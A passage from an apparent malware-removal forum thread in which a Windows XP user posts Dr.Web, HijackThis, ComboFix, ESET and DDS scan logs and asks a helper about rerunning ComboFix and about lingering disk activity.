BitmapReadBytes : 1732608 BitmapWrites : 341 BitmapWriteBytes : 2940928 MftBitmapReads : 9 MftBitmapReadBytes : 36864 MftBitmapWrites : 47 MftBitmapWriteBytes : 212992 UserIndexReads : 2135 UserIndexReadBytes : 8744960 UserIndexWrites : 899 UserIndexWriteBytes : 5820416 LogFileReads : 2 LogFileReadBytes : 8192 LogFileWrites : 3571 LogFileWriteBytes : 34832384 Here is DrWeb.csv. The first file (rar32.dll) was detected on the initial Startup/Quick Scan. The others were in the Complete Scan. They look as if they were all hidden in Restore Points. One of the entries had the DivX icon and another four had the icon for ComboFix. All but the first entry are now in Quarantine: rar32.dll;c:\windows\system32;Trojan.DownLoad.29209;Deleted.; A0048284.exe\32788R22FWJFW\c.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617\A0048284.exe;Probably BATCH.Virus;; A0048284.exe;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617;Archive contains infected objects;Moved.; A0048305.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617;Probably BATCH.Virus;; A0048431.exe\32788R22FWJFW\c.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617\A0048431.exe;Probably BATCH.Virus;; A0048431.exe;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP617;Archive contains infected objects;Moved.; A0048474.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP618;Probably BATCH.Virus;; A0048653.exe\32788R22FWJFW\c.bat;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP618\A0048653.exe;Probably BATCH.Virus;; A0048653.exe;C:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP618;Archive contains infected objects;Moved.; A0043160.exe/data015\data055;E:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP580\A0043160.exe/data015;DDoS.Nitecafe.6;; data015;E:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP580;Archive contains infected objects;; A0043160.exe;E:\System Volume Information\_restore{58A85B35-38BA-4D6E-8FD8-53ED36571EC7}\RP580;Archive contains infected objects;Moved.; Finally, here is a new HijackThis log. I got another error come up as soon as I did a scan. It came up in a General Protection Fault window and is the same error as the one received previously. I was unable to copy and paste it here and it said I had no internet connection to report the error. The log still came up fine though: Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 03:51:09, on 21/09/2009 Platform: Windows XP SP3 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.16791) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\System32\hkcmd.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\Program Files\NoAds\NoAds.exe C:\Program Files\HACE\Mmm\Mmm.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\Program Files\GetRight\GetRight.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://home.live.com/ R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896 R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157 O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (file missing) O2 - BHO: IE to GetRight Helper - {31FF080D-12A3-439A-A2EF-4BA95A3148E8} - C:\Program Files\GetRight\xx2gr.dll O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll (file missing) O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.0.1225.9868\swg.dll (file missing) O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll (file missing) O4 - HKLM\..\Run: [igfxTray] C:\WINDOWS\System32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\System32\hkcmd.exe O4 - HKLM\..\Run: [00THotkey] C:\WINDOWS\System32\00THotkey.exe O4 - HKLM\..\Run: [000StTHK] 000StTHK.exe O4 - HKLM\..\Run: [LTSMMSG] LTSMMSG.exe O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint2K\Apoint.exe O4 - HKLM\..\Run: [TouchED] C:\Program Files\TOSHIBA\TouchED\TouchED.Exe O4 - HKLM\..\Run: [PadTouch] "C:\Program Files\TOSHIBA\PadTouch\PadExe.exe O4 - HKLM\..\Run: [TFNF5] TFNF5.exe O4 - HKLM\..\Run: [TPSMain] TPSMain.exe O4 - HKLM\..\Run: [TFncKy] TFncKy.exe O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\system32\NeroCheck.exe O4 - HKLM\..\Run: [AVG8_TRAY] C:\PROGRA~1\AVG\AVG8\avgtray.exe O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE O4 - HKLM\..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" /runcleanupscript O4 - HKCU\..\Run: [NoAds] "C:\Program Files\NoAds\NoAds.exe" O4 - HKCU\..\Run: [Mmm] "C:\Program Files\HACE\Mmm\Mmm.exe" O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe O4 - Global Startup: Logitech SetPoint.lnk = C:\Program Files\Logitech\SetPoint\SetPoint.exe O4 - Global Startup: Microsoft Works Calendar Reminders.lnk = ? O4 - Global Startup: Start GetRight.lnk = C:\Program Files\GetRight\GetRight.exe O8 - Extra context menu item: Download with GetRight - C:\Program Files\GetRight\GRdownload.htm O8 - Extra context menu item: Open with GetRight Browser - C:\Program Files\GetRight\GRbrowse.htm O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O14 - IERESET.INF: START_PAGE_URL=file:///C:\Program Files\TOSHIBA\Free Update Service\splash.html O16 - DPF: {215B8138-A3CF-44C5-803F-8226143CFC0A} (Trend Micro ActiveX Scan Agent 6.6) - http://housecall65.trendmicro.com/housecal...ivex/hcImpl.cab O16 - DPF: {39B0684F-D7BF-4743-B050-FDC3F48F7E3B} - http://www.fileplanet.com/fpdlmgr/cabs/FPDC_2.3.6.108.cab O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://gfx1.hotmail.com/mail/w2/pr02/resources/MSNPUpld.cab O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1238014490265 O16 - DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} (OnlineScanner Control) - http://download.eset.com/special/eos/OnlineScanner.cab O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} (Java Runtime Environment 1.6.0) - http://dl8-cdn-01.sun.com/s/ESD44/JSCDL/jd...ows-i586-jc.cab O16 - DPF: {A796D216-2DE1-4EA8-BABB-FE6E7C959098} (HPSDDX Class) - http://www.hp.com/cpso-support-new/SDD/hpsddObjSigned.cab O16 - DPF: {A90A5822-F108-45AD-8482-9BC8B12DD539} (Crucial cpcScan) - http://crucial.com/controls/cpcScanner.cab O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx O18 - Protocol: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG8\avgpp.dll O20 - Winlogon Notify: avgrsstarter - C:\WINDOWS\SYSTEM32\avgrsstx.dll O23 - Service: AVG8 WatchDog (avg8wd) - AVG Technologies CZ, s.r.o. - C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe O23 - Service: C-DillaSrv - C-Dilla Ltd - C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE O23 - Service: ConfigFree Service (CFSvcs) - TOSHIBA CORPORATION - C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe O23 - Service: Google Updater Service (gusvc) - Unknown owner - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe (file missing) O23 - Service: Logitech Bluetooth Service (LBTServ) - Logitech, Inc. - C:\Program Files\Common Files\Logishrd\Bluetooth\LBTServ.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe -- End of file - 8507 bytes Thanks again.

Sorry for my previous question, I just wanted to make sure that it was okay to run ComboFix again after I had already used it once, seeing as you said download but don't run it. I didn't realise that you were referring to using ComboFix the second time round. Now that I understand what you mean, here is the new log for ComboFix: ComboFix 09-09-16.05 - user 17/09/2009 15:14.2.1 - NTFSx86 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.476 [GMT 1:00] Running from: c:\documents and settings\user\Desktop\Combo-Fix.exe Command switches used :: c:\documents and settings\user\Desktop\CFscript.txt AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF} FILE :: "c:\docume~1\user\LOCALS~1\Temp\gkmixern.sys" . ((((((((((((((((((((((((((((((((((((((( Other Deletions ))))))))))))))))))))))))))))))))))))))))))))))))) . . ((((((((((((((((((((((((((((((((((((((( Drivers/Services ))))))))))))))))))))))))))))))))))))))))))))))))) . -------\Legacy_GKMIXERN -------\Service_gkmixern ((((((((((((((((((((((((( Files Created from 2009-08-17 to 2009-09-17 ))))))))))))))))))))))))))))))) . 2009-09-13 02:38 . 2009-09-10 13:54 38224 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys 2009-09-13 02:38 . 2009-09-13 02:38 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware 2009-09-13 02:38 . 2009-09-10 13:53 19160 ----a-w- c:\windows\system32\drivers\mbam.sys 2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\user\Application Data\Malwarebytes 2009-09-03 03:25 . 2009-09-03 03:25 -------- d-----w- c:\documents and settings\All Users\Application Data\Malwarebytes 2009-08-31 21:37 . 2009-08-31 21:37 -------- d-----w- c:\program files\Trend Micro . (((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))) . 2009-09-17 13:51 . 2007-06-28 00:17 -------- d-----w- c:\program files\GetRight 2009-09-04 00:19 . 2005-05-27 22:46 -------- d-----w- c:\program files\ahead 2009-09-03 23:36 . 2003-12-03 15:08 -------- d--h--w- c:\program files\InstallShield Installation Information 2009-09-03 23:36 . 2007-08-13 07:14 -------- d-----w- c:\program files\Real 2009-09-03 23:32 . 2008-03-11 21:50 -------- d-----w- c:\program files\Meridian Advance 2009-09-03 01:46 . 2007-07-03 20:38 -------- d-----w- c:\program files\Bulk Image Downloader 2009-09-03 01:45 . 2009-04-16 05:46 -------- d-----w- c:\program files\PicaLoader 2009-08-30 17:55 . 2007-12-29 12:48 -------- d-----w- c:\documents and settings\user\Application Data\uTorrent 2009-08-24 02:17 . 2009-02-27 16:43 123 ----a-w- C:\drmHeader.bin 2009-08-21 10:05 . 2009-07-17 17:33 -------- d-----w- c:\documents and settings\user\Application Data\Free Audio Editor 2009-08-21 05:10 . 2008-06-19 10:53 11952 ----a-w- c:\windows\system32\avgrsstx.dll 2009-08-21 05:10 . 2008-06-19 10:53 335240 ----a-w- c:\windows\system32\drivers\avgldx86.sys 2009-08-21 05:10 . 2008-06-19 10:53 27784 ----a-w- c:\windows\system32\drivers\avgmfx86.sys 2009-07-29 22:14 . 2009-07-29 22:14 -------- d-----w- c:\program files\LucasArts . ((((((((((((((((((((((((((((((((((((( Reg Loading Points )))))))))))))))))))))))))))))))))))))))))))))))))) . . *Note* empty entries & legit default entries are not shown REGEDIT4 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "NoAds"="c:\program files\NoAds\NoAds.exe" [2007-10-27 151552] "Mmm"="c:\program files\HACE\Mmm\Mmm.exe" [2005-07-05 828416] "WMPNSCFG"="c:\program files\Windows Media Player\WMPNSCFG.exe" [2006-10-18 204288] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "IgfxTray"="c:\windows\System32\igfxtray.exe" [2003-04-07 155648] "HotKeysCmds"="c:\windows\System32\hkcmd.exe" [2003-04-07 114688] "00THotkey"="c:\windows\System32\00THotkey.exe" [2003-05-23 253952] "Apoint"="c:\program files\Apoint2K\Apoint.exe" [2003-07-17 159744] "TouchED"="c:\program files\TOSHIBA\TouchED\TouchED.Exe" [2003-03-11 122880] "PadTouch"="c:\program files\TOSHIBA\PadTouch\PadExe.exe" [2003-11-24 1019904] "NeroCheck"="c:\windows\system32\NeroCheck.exe" [2001-07-09 155648] "AVG8_TRAY"="c:\progra~1\AVG\AVG8\avgtray.exe" [2009-08-21 2007832] "Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080] "000StTHK"="000StTHK.exe" - c:\windows\system32\000StTHK.exe [2001-06-23 24576] "LTSMMSG"="LTSMMSG.exe" - c:\windows\ltsmmsg.exe [2003-04-18 32768] "TFNF5"="TFNF5.exe" - c:\windows\system32\TFNF5.exe [2003-10-15 73728] "TPSMain"="TPSMain.exe" - c:\windows\system32\TPSMain.exe [2003-11-27 266240] "TFncKy"="TFncKy.exe" [bU] "Kernel and Hardware Abstraction Layer"="KHALMNPR.EXE" - c:\windows\KHALMNPR.Exe [2008-12-18 76304] c:\documents and settings\All Users\Start Menu\Programs\Startup\ Adobe Reader Speed Launch.lnk - c:\program files\Adobe\Acrobat 7.0\Reader\reader_sl.exe [2008-4-23 29696] Logitech SetPoint.lnk - c:\program files\Logitech\SetPoint\SetPoint.exe [2009-6-2 809488] Microsoft Works Calendar Reminders.lnk - c:\program files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe [1999-9-4 53317] Start GetRight.lnk - c:\program files\GetRight\GetRight.exe [2007-6-28 4628752] [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\LBTWlgn] 2009-02-18 23:30 72208 ----a-w- c:\program files\Common Files\Logishrd\Bluetooth\LBTWLgn.dll [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\avgrsstarter] 2009-08-21 05:10 11952 ----a-w- c:\windows\system32\avgrsstx.dll [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\WdfLoadGroup] @="" [HKEY_LOCAL_MACHINE\software\microsoft\security center] "AntiVirusOverride"=dword:00000001 [HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List] "%windir%\\system32\\sessmgr.exe"= "%windir%\\Network Diagnostic\\xpnetdiag.exe"= "c:\\Program Files\\GetRight\\GetRight.exe"= "c:\\Program Files\\AVG\\AVG8\\avgupd.exe"= R1 AvgLdx86;AVG AVI Loader Driver x86;c:\windows\system32\drivers\avgldx86.sys [19/06/2008 11:53 335240] R1 SSHDRV76;SSHDRV76;c:\windows\system32\drivers\SSHDRV76.sys [24/05/2008 04:03 53760] R2 avg8wd;AVG8 WatchDog;c:\progra~1\AVG\AVG8\avgwdsvc.exe [02/02/2009 06:00 297752] S3 SMCWGU(SMC);SMCWUSB-G 802.11g Wireless USB 2.0 Adapter(SMC);c:\windows\system32\DRIVERS\SMCWGU.sys --> c:\windows\system32\DRIVERS\SMCWGU.sys [?] . . ------- Supplementary Scan ------- . uStart Page = hxxp://home.live.com/ uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8 uInternet Settings,ProxyOverride = <local> uSearchURL,(Default) = hxxp://www.google.com/search?q=%s IE: Download with GetRight - c:\program files\GetRight\GRdownload.htm IE: Open with GetRight Browser - c:\program files\GetRight\GRbrowse.htm . ************************************************************************** catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net Rootkit scan 2009-09-17 15:29 Windows 5.1.2600 Service Pack 3 NTFS scanning hidden processes ... scanning hidden autostart entries ... scanning hidden files ... scan completed successfully hidden files: 0 ************************************************************************** . --------------------- LOCKED REGISTRY KEYS --------------------- [HKEY_USERS\S-1-5-21-2888162382-313132713-241459312-1006\Software\Microsoft\SystemCertificates\AddressBook*] @Allowed: (Read) (RestrictedCode) @Allowed: (Read) (RestrictedCode) . --------------------- DLLs Loaded Under Running Processes --------------------- - - - - - - - > 'winlogon.exe'(620) c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll c:\program files\common files\logishrd\bluetooth\LBTServ.dll - - - - - - - > 'explorer.exe'(1576) c:\program files\Logitech\SetPoint\GameHook.dll c:\program files\Logitech\SetPoint\lgscroll.dll c:\program files\NoAds\NoAds.dll c:\windows\system32\WPDShServiceObj.dll c:\windows\system32\PortableDeviceTypes.dll c:\windows\system32\PortableDeviceApi.dll c:\windows\system32\TPwrCfg.DLL c:\windows\system32\TPwrReg.dll c:\windows\system32\TPSTrace.DLL . ------------------------ Other Running Processes ------------------------ . c:\windows\system32\drivers\CDANTSRV.EXE c:\program files\Toshiba\ConfigFree\CFSvcs.exe c:\program files\Analog Devices\SoundMAX\SMAgent.exe c:\program files\Windows Media Player\wmpnetwk.exe c:\program files\AVG\AVG8\avgrsx.exe c:\windows\system32\wscntfy.exe c:\program files\Toshiba\TOSHIBA Controls\TFncKy.exe c:\windows\system32\TPSBattM.exe c:\program files\Apoint2K\ApntEx.exe c:\program files\Common Files\Logishrd\KHAL2\KHALMNPR.exe . ************************************************************************** . Completion time: 2009-09-17 15:36 - machine was rebooted ComboFix-quarantined-files.txt 2009-09-17 14:35 ComboFix2.txt 2009-09-15 23:06 Pre-Run: 2,953,441,280 bytes free Post-Run: 2,902,618,112 bytes free 150 Here is the quarantine log for ComboFix as well. I know you didn't ask for it but I saw it had received a few more entries since the last time: 2009-09-17 14:20:21 . 2009-09-17 14:20:21 2,324 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Service_gkmixern.reg.dat 2009-09-17 14:20:21 . 2009-09-17 14:20:21 286 ----a-w- C:\Qoobox\Quarantine\Registry_backups\Legacy_GKMIXERN.reg.dat 2009-09-17 14:14:14 . 2009-09-17 14:14:14 0 ----a-w- C:\Qoobox\Quarantine\catchme.txt 2009-09-15 23:03:39 . 2009-09-15 23:03:39 680 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-TouchED.reg.dat 2009-09-15 23:03:39 . 2009-09-15 23:03:39 782 ----a-w- C:\Qoobox\Quarantine\Registry_backups\AddRemove-Power Saver.reg.dat 2009-09-15 22:58:09 . 2009-09-17 14:20:01 6,504 ----a-w- C:\Qoobox\Quarantine\Registry_backups\tcpip.reg 2009-09-15 22:46:21 . 2009-09-17 14:11:57 102 ----a-w- C:\Qoobox\Quarantine\catchme.log 2009-06-02 21:35:53 . 2009-06-02 21:35:53 53,248 ----a-w- C:\Qoobox\Quarantine\C\Documents and Settings\user\Application Data\Microsoft\Installer\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}\ARPPRODUCTICON.exe.vir 2002-12-11 19:39:08 . 2002-12-11 19:39:08 10,995,712 ----a-w- C:\Qoobox\Quarantine\C\WINDOWS\Installer\WMEncoder.msi.vir Next is the log for NOD32: ESETSmartInstaller@High as CAB hook log: OnlineScanner.ocx - registred OK # version=6 # iexplore.exe=7.00.6000.16791 (vista_gdr.081217-1620) # OnlineScanner.ocx=1.0.0.6050 # api_version=3.0.2 # EOSSerial=cf5e79d1be913942bfcccf9d9a7fda7f # end=finished # remove_checked=false # archives_checked=true # unwanted_checked=true # unsafe_checked=true # antistealth_checked=true # utc_time=2009-09-17 06:40:34 # local_time=2009-09-17 07:40:34 (+0000, GMT Daylight Time) # country="United Kingdom" # lang=1033 # osver=5.1.2600 NT Service Pack 3 # compatibility_mode=1026 37 66 100 23814030781250 # scanned=360755 # found=0 # cleaned=0 # scan_time=10304 Shortly before running ComboFix I switched off my router to kill the internet connection. Was it okay to do this? You said to disconnect from the internet but I wasn't sure if switching it off would prevent certain checks. I forgot I could alternatively switch off the connection, via the Local Area Connection icon in the System Tray. I'm still getting that 13.5KB worth of disk access every ten seconds, even after all of this. Could it be nothing to be worried about, seeing as all these scans haven't affected it? Regards.

Thanks for the reply. I didn't want to go ahead with this until I was absolutely certain. In your last post you said to download ComboFix but not run it (and further down you said not to run ComboFix more than once). However, I ran ComboFix after receiving your last post instructing me to do so. Because my last post was so long with all the added logs, I will give a brief summary of what I did. I switched on my external drive, ran MBAM on full scan. I then ran DDS.scr once again. After I did this I ran ComboFix for the first time, according to your previous instructions. I then ran HijackThis. After doing this I posted all the logs and in the order that I ran each program (with the exception of any new MBAM log as it was still showing a clean report). Therefore, seeing as I have already run ComboFix once, is it still okay to download and run it again, along with the separate script you have provided? I am assuming that if it is indeed okay to do so, that I once again rename ComboFix, when saving to Desktop, like I was instructed to do last time? Thanks again.

Sorry once again for the delay. I've had some non-computer related issues to deal with. I also thought it would be a good idea to do a full scan on my external hard drive, seeing as that was on when I got infected. I had it switched off until today because I didn't want any resident nasties transferring over to it, if they hadn't already done so. I don't put programs on it and so wanted to clean up C drive and the registry as much as I could before I used it again. MBAM didn't find anything on there. I did another DDS scan because of the external drive going back on. It was probably unnecessary but thought it wouldn't hurt. I'll list that first, followed by the ComboFix log and HijackThis log. I ran DDS before I ran ComboFix, not afterwards. DDS.txt: DDS (Ver_09-07-30.01) - NTFSx86 Run by user at 23:40:42.34 on 15/09/2009 Internet Explorer: 7.0.5730.11 Microsoft Windows XP Home Edition 5.1.2600.3.1252.44.1033.18.1007.373 [GMT 1:00] AV: AVG Anti-Virus Free *On-access scanning disabled* (Updated) {17DDD097-36FF-435F-9E1B-52D74245D6BF} ============== Running Processes =============== C:\WINDOWS\system32\svchost -k DcomLaunch svchost.exe C:\WINDOWS\System32\svchost.exe -k netsvcs svchost.exe svchost.exe C:\WINDOWS\system32\spoolsv.exe C:\PROGRA~1\AVG\AVG8\avgwdsvc.exe C:\WINDOWS\System32\DRIVERS\CDANTSRV.EXE C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe C:\WINDOWS\System32\svchost.exe -k HTTPFilter C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\PROGRA~1\AVG\AVG8\avgrsx.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\wscntfy.exe C:\WINDOWS\System32\00THotkey.exe C:\WINDOWS\LTSMMSG.exe C:\Program Files\Apoint2K\Apoint.exe C:\Program Files\TOSHIBA\TouchED\TouchED.Exe C:\Program Files\TOSHIBA\PadTouch\PadExe.exe C:\WINDOWS\system32\TFNF5.exe C:\Program Files\TOSHIBA\TOSHIBA Controls\TFncKy.exe C:\PROGRA~1\AVG\AVG8\avgtray.exe C:\WINDOWS\system32\TPSBattM.exe C:\Program Files\NoAds\NoAds.exe C:\WINDOWS\system32\ctfmon.exe C:\Program Files\HACE\Mmm\Mmm.exe C:\Program Files\Windows Media Player\WMPNSCFG.exe C:\Program Files\Apoint2K\Apntex.exe C:\Program Files\Logitech\SetPoint\SetPoint.exe C:\Program Files\Common Files\Microsoft Shared\Works Shared\wkcalrem.exe C:\Program Files\GetRight\GetRight.exe C:\Program Files\Common Files\Logishrd\KHAL2\KHALMNPR.EXE C:\Program Files\Internet Explorer\iexplore.exe C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe C:\Documents and Settings\user\Desktop\dds.scr ============== Pseudo HJT Report =============== uStart Page = hxxp://home.live.com/ uSearch Page = hxxp://www.google.com uSearch Bar = hxxp://www.google.com/ie uSearchMigratedDefaultURL = hxxp://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8 uInternet Settings,ProxyOverride = <local> uSearchAssistant = hxxp://www.google.com/ie uSearchURL,(Default) = hxxp://www.google.com/search?q=%s mSearchAssistant = hxxp://www.google.com/ie BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\adobe\acrobat 7.0\activex\AcroIEHelper.dll BHO: IE to GetRight Helper: {31ff080d-12a3-439a-a2ef-4ba95a3148e8} - c:\program files\getright\xx2gr.dll BHO: AVG Safe Search: {3ca2f312-6f6e-4b53-a66e-4e65e497c8c0} - c:\program files\avg\avg8\avgssie.dll BHO: Spybot-S&D IE Protection: {53707962-6f74-2d53-2644-206d7942484f} - c:\progra~1\spybot~1\SDHelper.dll BHO: SSVHelper Class: {761497bb-d6f0-462c-b6eb-d4daf1d92d43} - c:\program files\java\jre1.6.0_07\bin\ssv.dll BHO: Google Toolbar Helper: {aa58ed58-01dd-4d91-8333-cf10577473f7} - c:\program files\google\googletoolbar2.dll BHO: Google Toolbar Notifier BHO: {af69de43-7d58-4638-b6fa-ce66b5ad205d} - c:\program files\google\googletoolbarnotifier\3.0.1225.9868\swg.dll TB: &Google: {2318c2b1-4965-11d4-9b18-009027a5cd4f} - c:\program files\google\googletoolbar2.dll TB: Yahoo! Toolbar: {ef99bd32-c1fb-11d2-892f-0090271d4f88} - EB: {4528BBE0-4E08-11D5-AD55-00010333D0AD} - No File EB: {32683183-48a0-441b-a342-7c2a440a9478} - No File uRun: [NoAds] "c:\program files\noads\NoAds.exe" uRun: [ctfmon.exe] c:\windows\system32\ctfmon.exe uRun: [Mmm] "c:\program files\hace\mmm\Mmm.exe" uRun: [WMPNSCFG] c:\program files\windows media player\WMPNSCFG.exe mRun: [igfxTray] c:\windows\system32\igfxtray.exe mRun: [HotKeysCmds] 